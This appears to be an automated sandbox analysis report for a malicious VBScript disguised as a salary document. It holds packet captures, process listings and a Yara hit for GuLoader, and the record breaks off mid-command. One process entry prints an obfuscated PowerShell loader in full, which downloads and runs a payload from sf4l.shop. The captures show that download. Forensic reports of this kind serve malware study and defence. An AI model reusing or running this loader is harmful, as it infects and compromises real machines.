2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 72 4d 4c 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 53 64 6e 4c 59 70 37 4a 2f 49 62 6c 37 38 6c 33 59 7a 4b 70 4f 33 35 44 62 2f 31 4d 50 36 35 30 68 71 6e 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 53 52 79 39 6b 6b 30 48 38 43 6c 6c 55 6e 77 5a 6f 57 35 7a 4c 38 59 75 6f 39 55 68 6f 66 6f 33 52 74 42 37 36 72 42 55 43 58 73 5a 4b 58 54 34 4d 53 6d 35 64 31 55 58 46 33 70 4b 4c 2f 4f 4b 63 73 54 36 56 63 56 56 33 44 6e 31 42 79 7a 61 6e 50 4c 58 5a 65 4c 33 6e 54 6c 71 2f 54 56 58 4e 6a 4e 2b 66 2f 69 39 65 6e 4b 32 50 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 56 78 56 68 52 35 58 35 6f 4a 48 68 58 49 4f 6d 67 75 4c 6b 6f 35 51 Data Ascii: rMLd0b+undG/rp3Rv66d0b+undG/rp3SdnLYp7J/Ibl78l3YzKpO35Db/1MP650hqn6d0b+undG/rp3Rv66d0b+undG/rp3SRy9kk0H8CllUnwZoW5zL8Yuo9Uhofo3RtB76rBUCXsZKXT4MSm5d1UXF3pKL/OKcsT6VcVV3Dn1ByzanPLXZeL3nTlq/TVXNjN+f/i9enK2Prp3Rv66d0b+undG/rp3Rv66d0b+uVxVhR5X5oJHhXIOmguLko5Q
2024-10-21 15:05:26 UTC	1225	IN	Data Raw: 63 38 43 2b 37 34 30 6d 73 64 56 54 39 2b 2f 64 41 6e 7a 4b 62 32 6d 58 33 66 53 62 47 4a 72 43 2b 34 4c 49 2b 56 56 33 6d 59 79 70 64 4b 4d 6d 6e 70 33 75 45 2b 77 57 36 4f 31 69 33 2f 73 58 67 32 30 6a 57 44 55 75 44 45 51 46 76 58 2f 75 70 6a 51 6e 37 7a 70 4e 37 6d 62 73 69 49 4c 66 6b 79 4b 46 67 6d 44 2f 31 36 4d 36 42 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 35 54 6e 55 2f 6c 51 4d 31 39 49 37 6d 53 46 56 69 6c 70 37 46 57 61 77 35 41 45 44 4a 59 61 64 4b 52 7a 79 44 4d 70 7a 48 63 62 4d 4d 56 64 4b 76 56 76 66 6f 6d 2f 33 53 56 42 4c 72 34 44 44 44 45 45 32 32 30 43 31 4c 4f 6c 47 6e 39 66 41 4d 6e 56 55 61 78 36 46 4d 6d 30 68 65 44 38 65 63 51 36 6f 46 49 6a 46 2b 51 62 30 6e 67 6a 4f 69 45 4a 58 48 33 Data Ascii: c8C+740msdVT9+/dAnzKb2mX3fSbGJrC+4LI+VV3mYypdKMmnp3uE+wW6O1i3/sXg20jWDUuDEQFvX/upjQn7zpN7mbsiILfkyKFgmD/16M6B+undG/rp3Rv66d0b+undG/rp3Rv65TnU/lQM19I7mSFVilp7FWaw5AEDJYadKRzyDMpzHcbMMVdKvVvfom/3SVBLr4DDDEE220C1LOlGn9fAMnVUax6FMm0heD8ecQ6oFIjF+Qb0ngjOiEJXH3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49930	188.114.97.3	443	8140	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 15:05:53 UTC	186	OUT	GET /znUvwLfo/XAManxzmrlwVYAnDZ78.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sf4l.shop Cache-Control: no-cache
2024-10-21 15:05:54 UTC	828	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 15:05:54 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 21 Oct 2024 15:05:54 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dh748ytpoiZjPW0mVaOFH34DMy2JhfXcVeZS590Y6IteqdJZ6jPWz1mJlvTqu%2FpLhf8XaXYqdh7LHmQN4dst07%2BFdqz1FyN2y9APgZ5XsCQEZ5EUVtEW3MB44w4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6226015fc442d8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=824&delivery_rate=2819863&cwnd=251&unsent_bytes=0&cid=96dbe4b13657a19f&ts=802&x=0"
2024-10-21 15:05:54 UTC	541	IN	Data Raw: 33 38 63 35 0d 0a 02 ab f2 8d d1 e3 f5 c1 50 44 fb 99 ca cf 8d 76 89 30 26 c0 90 7a 40 80 1a f3 50 3c 40 c4 41 f7 9f ae b1 9b ec 92 25 cc 2f 40 ea 3c c4 6e 4e c6 07 8f ee a4 5f ec 2f 39 5d 14 50 b6 05 a8 df 0c f2 e0 90 58 96 87 f6 55 4b 62 ca eb 0a c8 26 f5 d6 5f 52 95 11 d7 7d 71 5e 80 02 d3 5a 83 34 c3 c0 bb 50 3b b8 98 f8 14 2f 36 4d 8c 74 91 21 7a 2d 92 a0 48 4e d5 9e 48 34 96 e0 05 fd a2 91 2c 5b 84 82 9e af 85 85 fb 06 e7 06 ad c4 c4 45 bd 4a f4 00 74 30 49 02 da 7c fc e5 aa f6 48 ac 99 36 48 a7 38 42 90 0d c0 18 5b 17 3a 86 af 40 75 10 73 b1 ab 20 2b df 93 b8 d1 fd 6e d7 66 e1 77 e8 32 89 01 7f d7 a7 2f da 70 77 aa 72 54 4f 71 1c 98 dd c8 e3 13 2d 00 20 f6 9a f3 4c 84 1e 1d e8 71 af 80 9f 61 a3 64 56 1b 44 86 f0 29 42 64 aa 04 69 1a f2 5c f8 ec f3 Data Ascii: 38c5PDv0&z@P<@A%/@<nN_/9]PXUKb&_R}q^Z4P;/6Mt!z-HNH4,[EJt0I\|H6H8B[:@us +nfw2/pwrTOq- LqadVD)Bdi\
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: f3 c9 1a b5 25 6a 9a a0 f3 ce 9a 89 66 63 7c 04 ef 4e 88 d3 da ff ec ab 2c a5 43 de f2 63 c0 2e f1 3a ce 26 78 34 9c b7 59 19 44 a0 2d 7e 9c ea 4e 1d 69 4b ed f0 ab cd a2 0d 21 90 25 d1 03 4d 78 63 3f 6c 73 84 7b d3 b3 b0 51 f7 1b e6 09 d7 82 bb 29 f6 6f 9e ce 2b fe d7 ac a7 07 53 2f e4 89 e3 e2 4e 88 3c 18 f8 02 ac 92 e2 40 60 e3 3c a3 44 55 2c 56 7d 80 66 47 6d 5d 53 ea c1 f3 24 dd dc 3a 80 41 6b 94 1b c0 00 83 d8 59 71 a5 af b8 09 9d 39 84 dd 6f e3 5e 36 bf 15 c5 78 9b 2b 19 95 77 3d 25 b3 bf cd e7 99 eb 2c 64 62 ba 4c f8 57 1e 3e 44 03 f8 d5 75 0a 48 c4 e6 b4 b5 10 74 f2 fb 05 1c 84 e3 1a f2 f1 13 cf 91 b4 b1 ad ea 92 00 fb 9b c7 75 87 c5 f4 dc 75 99 82 97 a0 fa e0 60 48 53 91 64 28 7a a9 a0 87 76 1b 65 d9 5d c0 48 2c dc 80 cc 22 90 f1 04 01 30 99 4a Data Ascii: %jfc\|N,Cc.:&x4YD-~NiK!%Mxc?ls{Q)o+S/N<@`<DU,V}fGm]S$:AkYq9o^6x+w=%,dbLW>DuHtuu`HSd(zve]H,"0J
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: a0 f8 a2 e3 05 bc 60 28 cc 01 dc 38 78 31 3c 8c 36 4f 7c 86 a4 09 0d a7 e1 20 87 79 c7 fb 5e 30 ef 1d 79 4d c4 97 26 aa db c3 2d c5 b5 c2 d6 7b ae 61 f1 13 1a 7b 18 47 12 7d f4 5d fd 0e 26 ba ae 1d 94 fd 86 5f 52 e2 77 bd 8a 5b 2c 8e 55 24 16 92 82 d1 e7 3a 4e f1 4e 61 5b fa 5e c8 3d f8 7e 85 b3 06 95 f5 d9 c8 8b 56 fa 8b fe a1 30 f4 5f 17 91 4c cc ba 33 cd d9 95 14 43 65 b8 2c 2e 2b 26 e2 e4 c9 35 7d e4 5f 92 65 cc f7 a0 5f 42 bd 8b 09 9e 73 6f 0c 2a 64 df c1 14 10 d5 fd 6c b3 6c 35 fe 88 fc 8d 4b 34 e2 ee 08 8f d3 45 5c 41 7e 87 18 3d 4b c4 80 49 20 4a 19 72 03 0e 17 74 99 1d a9 f0 cb 92 27 6e 78 42 de c4 28 15 c7 ce e7 3a 7a a9 71 a8 a6 ba a6 59 79 9e d7 fb d8 ac ef 85 ff 6f d0 76 fb f2 c1 32 a8 85 1f 1d b1 ac 50 10 fc 24 24 d0 9b 82 ac 43 ce 9e 99 b2 Data Ascii: `(8x1<6O\| y^0yM&-{a{G}]&_Rw[,U$:NNa[^=~V0_L3Ce,.+&5}_e_Bso*dll5K4E\A~=KI Jrt'nxB(:zqYyov2P$$C
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: 82 f2 23 4b 9b 73 0b ef ca 17 58 96 7f 61 4a cf 5f cb 84 b4 6d 30 90 e2 9d 48 a2 59 d1 b6 10 53 7d 3d 8c 2b f6 33 df 18 4d 8d 15 b1 7c 67 bc 8c 4a fc 68 4f b2 59 6c 64 44 ad e4 bc 39 9a c6 89 a2 85 95 9d a5 0e 87 ef 0e 80 ca 21 36 93 8a 66 6f 4e 58 bd 06 fc 4f 2c 94 aa 86 fc 17 5a 82 e3 96 1d dc d6 f3 70 f6 42 86 d3 81 e2 fa 1d b8 6a 8a 51 08 4b 0a 85 39 f8 44 86 52 a8 c2 e0 cd 0c 43 17 08 88 05 3b a2 1b 2b 34 db 18 f3 12 6f 28 ca e9 f9 1c da bf 08 bd 0e 00 86 38 22 ff 7d 02 62 5f 42 1f 2e 83 64 08 c6 cf 2f 49 6f 75 d1 57 2b 07 b9 63 29 ca 1b 7a 75 f5 24 86 72 0a 5f 8b ca 53 9f 7f 72 07 90 42 aa 50 2c fd 8d 70 65 92 63 ac bd f1 95 2a 5f c9 49 59 d3 11 d5 75 b4 b8 b6 bb 6f 62 a1 82 b9 fa b7 24 d6 0f dc 8e ae 25 c8 05 7d f1 32 0f f3 52 70 65 5f 5a 2e f1 1d Data Ascii: #KsXaJ_m0HYS}=+3M\|gJhOYldD9!6foNXO,ZpBjQK9DRC;+4o(8"}b_B.d/IouW+c)zu$r_SrBP,pec*_IYuob$%}2Rpe_Z.
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: d2 4c 56 e9 7a a5 4b 24 d0 ca 2b 19 22 00 88 4f e1 c9 af c1 7b 48 db b7 6d f4 7b c2 7e 3c 7e 0a 55 6f 7f bc 27 3b 7c 85 e3 1c ca e1 19 6e b5 cc 28 1c c1 85 78 92 d9 f5 f4 02 8f ac 49 51 14 0c 13 41 1f 3b ff 79 d9 7a 7d 3e e9 7f 6d 46 a3 fd 64 b9 e2 44 63 e4 33 51 bd e8 59 33 59 db 99 ed b3 cf 2e aa 5a 72 c6 a6 07 f2 41 0b 02 e4 8c 8c 97 a9 3f d4 ab 33 f3 c6 bb 01 1f 33 c2 71 61 e7 30 89 53 de 27 76 93 cb 37 7a f8 59 19 7f c2 6d 9f 2d 82 6f ef 92 28 9e 66 5e 70 28 ba 06 f3 1e 83 a0 68 52 74 35 6f 8e c7 d1 d6 34 28 eb 71 44 46 ee 06 b1 19 2b 21 ea ce 8a 44 e4 31 57 5e 12 2c 78 b2 99 a7 17 e5 cc 06 28 ca d9 74 96 46 8c 93 34 39 df d1 00 2e c3 4d 12 ff b0 b3 b3 6c c9 e8 c4 71 ab 7d 69 99 bf 83 83 da 94 fc 86 1f f0 7b 99 90 e7 5a c0 aa 49 fc 7b 25 be 84 ac 46 Data Ascii: LVzK$+"O{Hm{~<~Uo';\|n(xIQA;yz}>mFdDc3QY3Y.ZrA?33qa0S'v7zYm-o(f^p(hRt5o4(qDF+!D1W^,x(tF49.Mlq}i{ZI{%F
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: 11 79 47 61 18 78 eb 35 98 3e 80 41 a0 7c 90 4f ad 9a b9 25 63 86 47 5f b3 3f c6 0f d5 3e b5 d5 f9 59 f0 38 87 94 7d 92 5e 9f e0 d8 4c 40 9d 0f ce 19 d3 9b a1 7e 40 d3 51 82 9f ca fc 07 5e 85 88 83 92 0e 77 38 e8 8b a2 11 0f 11 84 1d 45 a2 7a d8 27 10 4a 4e 52 61 5a e8 94 96 87 75 04 23 da 30 dc 18 7c 1a 5f 05 5b a9 c3 a3 79 75 d1 85 56 2f 91 fd d0 ec ce b5 14 4b 2c dc 0b 99 22 1b 3e 6e 01 5a d9 c3 a6 23 6a 62 31 58 42 11 c8 10 53 5a c8 f3 99 a8 50 c8 4a 77 45 fe e2 e2 d1 3e ff 46 9e b9 9d c4 08 93 97 b0 eb 3c 74 8e 91 94 f0 9b f7 8c cf 80 0d 1c 28 02 b2 9c 2e 32 31 1f bf d5 d3 e3 46 84 dc 54 73 1d 97 1c 4c 3b 3c 25 fa da c4 de 9e 7a 56 98 2f a4 5d f6 d4 99 58 51 3c 46 34 c2 41 e3 27 0f 73 1a 72 cf 0e eb 60 81 7f 81 92 71 5e f9 f8 66 bd 91 8b f7 90 c8 54 Data Ascii: yGax5>A\|O%cG_?>Y8}^L@~@Q^w8Ez'JNRaZu#0\|_[yuV/K,">nZ#jb1XBSZPJwE>F<t(.21FTsL;<%zV/]XQ<F4A'sr`q^fT
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: 58 b6 0a 60 e6 84 2a 92 9d 7a 4b c9 d9 40 d7 93 fa 51 c7 30 e5 b7 c0 aa bc 0a 52 a9 d0 42 2e dd dc 12 8a 64 14 30 d7 4a 93 a2 98 4d 9d 85 d1 0f 80 66 c3 3e 6a 05 43 e8 b2 4c 7b b0 d0 ad 79 de b6 c8 6c 49 9f 25 2f 29 ef 40 da 48 b8 c7 52 ae cb e7 a9 c5 7e 2a 3f b6 4a c6 96 50 42 20 d2 c7 69 ba f6 6d 57 89 e8 14 ac 3d 00 6f fc 32 1a a4 4a ad bf a2 26 70 0b 27 3c 7b 9b 35 cc 8a 21 4a fa ef fc f6 b0 9d dc 5c b5 81 d9 8a db 44 28 83 c1 8c 03 66 88 0a 4d 13 46 04 48 71 ea 32 84 db 95 4d df fc be 2e de 7c 0c 0e 16 14 34 84 f2 7a 76 d5 9b e8 3d 4a 36 e6 e2 ce a2 a8 a4 3f 4b 2c 6d 00 28 77 5b d1 bf 93 7d 95 59 31 ec ea 46 be 02 8a 71 95 88 a1 73 63 c6 57 de 32 75 f1 4d 8d be 52 18 5b 47 ae 82 40 5c 06 07 49 a4 26 4b 92 89 c6 da 98 4b 5f e9 04 3e 42 ad 81 2d 57 b3 Data Ascii: X`zK@Q0RB.d0JMf>jCL{ylI%/)@HR~?JPB imW=o2J&p'<{5!J\D(fMFHq2M.\|4zv=J6?K,m(w[}Y1FqscW2uMR[G@\I&KK_>B-W
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: 6e f5 d1 a1 08 38 a1 b9 e8 83 10 53 96 ec 5c 2b 8a 85 7e 1c d0 e2 60 63 8c 9f 29 24 6a b9 ed 63 02 79 1c 50 99 90 1e ee 79 ed 86 4b f0 bf 5b 02 c3 ed a9 11 18 d0 a8 0f 75 0f 04 10 a9 17 1f 7d 39 63 79 f1 ce bb ac d7 53 76 38 f9 d7 1d 9f 66 d2 2c fd 8d c1 e1 83 63 45 c3 7a 45 a7 82 05 d1 59 d3 11 64 11 a5 b8 5f c9 e4 b2 2c 76 37 34 f5 05 00 84 90 f3 21 1c 6a 49 59 b9 51 cd c2 56 99 10 d4 8a a3 d7 38 14 ad 21 e2 aa 86 d0 47 95 2d eb 07 ec d5 cb 38 9a 19 e6 1f 9e b7 1b 5f 4d 04 e2 a7 1d b2 3a d1 34 90 a9 12 86 b4 0a f2 f1 30 e2 1b fb f4 1f c4 86 27 44 b4 1f 9e b1 4d ff 51 dd 9f 6f 66 87 59 06 6a c0 f6 a6 0b fe 28 be ad b8 70 17 52 60 f2 a3 42 90 5e 77 14 8e 57 76 ab 14 d6 dd 4d d1 5a 59 f6 64 6d 25 2d 8b 29 c9 64 4f 52 99 ad 6a 78 cd a5 3d 69 99 ba 7e f8 ce Data Ascii: n8S\+~`c)$jcyPyK[u}9cySv8f,cEzEYd_,v74!jIYQV8!G-8_M:40'DMQofYj(pR`B^wWvMZYdm%-)dORjx=i~
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: e9 6e c2 63 05 d4 37 bf 95 bb c4 ac 87 7b 16 bf b4 10 0a 4e 5b ca dd 9b 05 1b 01 7c b8 f2 9c 0c a1 71 e2 5d 2c d4 06 59 89 77 52 74 dd 61 84 c7 38 2f 31 06 16 fa 00 da ad f3 fd 22 cb 22 22 0b 48 11 b7 ec 01 5c 3b f8 c2 c1 d5 31 ef ac 06 ee 5d 26 26 8b 38 47 fc 94 34 39 d0 10 ff 40 64 2c c5 fe 23 3c 7d 6d b8 15 3b 8e 76 22 0a 8c 8a 97 08 72 48 da 80 85 0d 84 12 dd 63 aa 37 c4 4a 77 d4 fb dd 94 b6 dd 2e 12 89 5d 19 d9 92 56 fe f3 4f f7 f0 9c 18 93 a6 8d ff dd 08 84 8e 73 a5 91 e4 b4 88 a2 8c 8d fb dd f9 11 19 96 38 a0 97 6d a5 f1 64 9e b1 03 3a 89 3f 73 50 42 b3 70 37 6b 62 e3 dc 4c 37 3b e8 9a 6e 3f fe 3e cb 0b fe d5 4c 7e 3c f9 b9 14 a9 30 6d 26 1e 47 2b e7 bc 7b 16 0a d8 5d 39 7d 80 f2 8e a6 f2 d6 25 4c 85 4b 09 96 31 39 60 cd e4 8e 80 bc 60 fd d2 16 6a Data Ascii: nc7{N[\|q],YwRta8/1"""H\;1]&&8G49@d,#<}m;v"rHc7Jw.]VOs8md:?sPBp7kbL7;n?>L~<0m&G+{]9}%LK19``j
2024-10-21 15:05:54 UTC	1369	IN	Data Raw: 86 c4 9f 70 33 dd 14 31 70 6d bb 9d 6e aa 40 2f 63 fe 4f 8d a6 6a b4 c1 d5 06 9b 6d 65 ab 37 1f 3b e4 62 d0 6c c6 6c 7f 82 92 65 7e 33 17 9f 90 d5 35 79 52 09 21 96 f0 e9 78 cb 6e 4f 02 d2 19 02 39 9f 64 26 fd 52 20 3f d3 c7 8a a7 51 43 00 fa 8e 97 59 4f 75 25 b5 c1 c4 de 1e 7d d1 dd 7c c7 d1 5f 7b 99 7c 9d 20 73 39 c0 3d d8 a0 4c 55 30 99 8b fe 49 c4 57 ee e2 0e 2c 05 3b 17 12 12 53 e8 46 b8 37 a4 9d 9a c9 9e 82 68 9f 54 7d 43 a4 cc eb e2 c3 e7 fb d9 7e 80 96 fb d1 c8 98 63 58 2a 06 49 c8 ee 11 be 4f 39 ea 9b 74 4e 12 97 7b 9e 70 b6 70 44 cf 11 92 e8 ad f1 8e 7b 2a fc f3 d3 dc a8 05 1a 35 8a 29 0e 98 9f 8b 44 91 b9 da a8 0d 11 13 0e ca a3 7f ce 63 d3 26 51 02 9c 45 fa e4 55 e1 43 70 a0 82 5a ba 52 96 b3 82 c0 d0 94 2d 24 d3 1d d2 5b 35 ef ba 16 a0 98 44 Data Ascii: p31pmn@/cOjme7;blle~35yR!xnO9d&R ?QCYOu%}\|_{\| s9=LU0IW,;SF7hT}C~cXIO9tN{ppD{5)Dc&QEUCpZR-$[5D

Target ID:	0
Start time:	11:05:15
Start date:	21/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
Imagebase:	0x7ff669d60000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	11:05:17
Start date:	21/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	11:05:17
Start date:	21/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	11:05:30
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 